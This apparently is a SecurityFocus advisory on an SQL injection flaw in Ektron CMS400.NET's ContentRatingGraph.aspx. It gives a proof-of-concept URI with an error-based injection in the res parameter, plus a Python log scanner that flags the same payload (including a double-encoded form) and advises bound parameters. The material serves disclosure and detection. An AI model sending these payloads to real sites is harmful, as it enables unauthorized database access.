Ektron CMS400.NET 'ContentRatingGraph.aspx' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available; the injected SQL is carried in the `res` parameter:

http://www.example.com/WorkArea/ContentRatingGraph.aspx?type=time&view=day&res_type=content&res=1%20and%201=convert(int,db_name())--&EndDate=5%2f10%2f2008+12%3a00%3a00+AM
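
A defender-side check for the request pattern in the proof of concept above, as an added example that is not part of the original advisory: it flags requests to ContentRatingGraph.aspx whose `res` value is not a plain decimal ID. The four-field log layout, the function names and the premise that a legitimate `res` is numeric are assumptions of this example, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

TARGET_STEM = "/workarea/contentratinggraph.aspx"
# Assumption: a legitimate `res` value is a decimal content ID and nothing else.
PLAIN_ID = re.compile(r"[0-9]{1,10}")

def bad_res_values(stem, query):
    """Return decoded `res` values that are not plain integers ([] if none)."""
    if unquote(stem).lower() != TARGET_STEM:
        return []
    bad = []
    # parse_qs percent-decodes once and maps '+' to a space.
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key.lower() != "res":
            continue
        for value in values:
            value = unquote(value)  # second decode catches double-encoded input
            if not PLAIN_ID.fullmatch(value):
                bad.append(value)
    return bad

# Constructed sample lines: client IP, cs-uri-stem, cs-uri-query, sc-status.
SAMPLE_LOG = """\
192.0.2.10 /WorkArea/ContentRatingGraph.aspx type=time&view=day&res_type=content&res=42&EndDate=5%2f10%2f2008 200
192.0.2.77 /WorkArea/ContentRatingGraph.aspx type=time&view=day&res_type=content&res=1%20and%201=convert(int,db_name())--&EndDate=5%2f10%2f2008+12%3a00%3a00+AM 500
192.0.2.77 /workarea/contentratinggraph.ASPX res=1%2520and%25201=convert(int,db_name())-- 500
192.0.2.10 /WorkArea/other.aspx res=abc 200
"""

def scan(log_text):
    """Return (client_ip, status, decoded_res) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip lines that do not match the assumed layout
        ip, stem, query, status = fields
        for value in bad_res_values(stem, query):
            hits.append((ip, status, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application itself: parse `res` as an integer and pass it to the query as a bound parameter rather than concatenating it into SQL.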


 

Copyright 2010, SecurityFocus